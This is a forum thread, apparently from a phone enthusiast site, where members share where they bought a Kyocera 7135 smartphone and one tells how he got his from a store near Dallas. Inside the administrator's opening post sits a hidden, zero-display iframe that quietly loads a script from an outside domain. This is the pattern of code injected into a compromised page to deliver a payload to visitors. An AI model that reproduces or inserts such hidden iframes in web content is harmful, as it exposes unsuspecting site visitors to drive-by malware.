Poll: Where Did You Purchase Your 7135?

+ Reply to Thread
    Administrator

Poll on 7135 - Where Purchased

The results will show how may are enjoying this phone while the rest of us are waiting. Thanks for your input.

RayB

Note: Posted for Rjblake.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Someone voted that he/she purchased thru Verizon in their midwset area. I would appreciate any details you could provide because the only thing I've noticed is purchases in the midwest thru B2B or corp.
    Thanks.

RayB

Steve did, but his was through corp.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Steve did, but his was through corp.
    YES and I am VERY HAPPY, The last time I was at the mall in Early March the VZ guy sad "Oh it should be here for around $60 in May, its been delayed a lot." I should go to the mall and whip out my 7135 and see if he's shocked. LOL
    iPhone therefore iAm.

How I got my 7135

I actually had given up on the 7135. My Sprint phone slide off of the console of my Suburban and straight into a soft drink. I went to the Sprint store to get it replaced. They told me they could not help me replace my phone but they could sell me another one. I would have to wait several days for a replacement. I was ready to buy when I notice a Verizon wireless store across the parking lot. I walked over there and asked if they had the 7135. I stood there while the two people behind the counter visited. I figured this was a reprise of the idiot show that I have read about on this board. Next thing I know the lady walks out with a 7135!!

She let me play with it and then she lowers the boom on me...this one is a demo and it can not be sold. As smoke starts to come out of my ears she tells me that I can order one. As I start toward the front door, I ask when it could be shipped. I am halfway out and she says I will have it day after tomorrow. I made a u-turn and bought it. They gave me a loaner phone and sure enough my 7135 arrived FedEx two days later. One three minute call and my new number was on my 7135.

Now if I can figure out all it does.

I am north of Dallas in Frisco.

Congrats Rockfish!
    ~'kito
    pdaPhoneHome Moderator

Mod-Blog's SmartPhone Correspondent
    The Mad Scientist finally made the plunge from Kyocera directly. Wish me luck.

Originally posted by nomad7674
    The Mad Scientist finally made the plunge from Kyocera directly. Wish me luck.
    Congrats nomad! I got your message last night... good to see that you are onboard, and online! :clap

Let us know how you like it!
    Please visit my picture site: Robert-O-Rama :)